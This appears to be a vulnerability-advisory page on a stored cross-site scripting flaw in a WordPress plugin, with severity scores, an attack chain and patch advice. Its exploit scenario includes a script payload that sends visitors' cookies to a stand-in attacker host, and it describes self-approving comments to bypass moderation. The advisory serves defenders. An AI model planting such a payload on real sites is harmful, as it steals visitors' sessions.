Skip to main content

JSON API User EUVDEUVD-2026-41490

| CVE-2026-9626 MEDIUM
Cross-site Scripting (XSS) (CWE-79)
2026-07-03 Wordfence GHSA-4689-rgvq-62r3
6.4
CVSS 3.1 · Vendor: Wordfence
Share

Severity by source

Vendor (Wordfence) PRIMARY
6.4 MEDIUM
AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
vuln.today AI
5.4 MEDIUM

Stored XSS requires a victim to visit the injected page (UI:R); subscriber-level account to plant payload (PR:L); scope change reflects browser context escape (S:C).

3.1 AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
4.0 AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N

Primary rating from Vendor (Wordfence).

CVSS VectorVendor: Wordfence

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Changed
Confidentiality
Low
Integrity
Low
Availability
None

Lifecycle Timeline

2
Analysis Generated
Jul 03, 2026 - 05:49 vuln.today
CVE Published
Jul 03, 2026 - 04:30 cve.org
MEDIUM 6.4

DescriptionCVE.org

The JSON API User plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'content' parameter of the post_comment API endpoint in versions up to, and including, 4.1.0 This is due to insufficient input sanitization in the post_comment() function, which passes the attacker-controlled comment_content value directly to wp_insert_comment() without applying any HTML sanitization, and additionally allows the caller to set comment_approved=1 to self-approve the comment and bypass moderation. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

AnalysisAI

Stored Cross-Site Scripting in the JSON API User WordPress plugin (versions ≤ 4.1.0) allows authenticated attackers with subscriber-level or higher access to inject persistent JavaScript via the content parameter of the post_comment API endpoint. The plugin's post_comment() function passes attacker-controlled comment_content directly to WordPress's native wp_insert_comment() without any HTML sanitization, and a compounding design flaw permits callers to supply comment_approved=1 to self-approve comments and entirely bypass the WordPress moderation queue. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Self-register or obtain subscriber-level WordPress account
Delivery
POST crafted XSS payload in `content` parameter with `comment_approved=1`
Exploit
Plugin passes unsanitized `comment_content` to `wp_insert_comment()`
Execution
Malicious comment stored in database, immediately approved without moderation
Persist
Victim loads affected WordPress page
Impact
Injected script executes in victim's browser session

Vulnerability AssessmentAI

Exploitation Exploitation requires an authenticated WordPress account with subscriber-level access or above on the target site running JSON API User plugin version 4.1.0 or earlier. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The CVSS 3.1 vector (AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N, score 6.4) reflects network-accessible exploitation with low complexity, requiring only a subscriber-level account, with a scope change indicating the impact escapes the WordPress server and executes in victim browsers. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker self-registers a subscriber account on a WordPress site with open registration enabled, then sends a crafted POST request to the plugin's `post_comment` API endpoint with a JavaScript payload in the `content` parameter (e.g., `<script>document.location='https://attacker.example/steal?c='+document.cookie</script>`) and the `comment_approved=1` flag set. The comment is stored in the WordPress database without sanitization and immediately published, bypassing moderation. …
Remediation Update the JSON API User plugin to version 4.1.2 or later, which addresses the missing sanitization in `post_comment()` and the unauthorized `comment_approved` self-approval, as evidenced by the Trac changeset at https://plugins.trac.wordpress.org/changeset?old_path=%2Fjson-api-user/tags/4.1.0&new_path=%2Fjson-api-user/tags/4.1.2. … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

EUVD-2026-41490 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy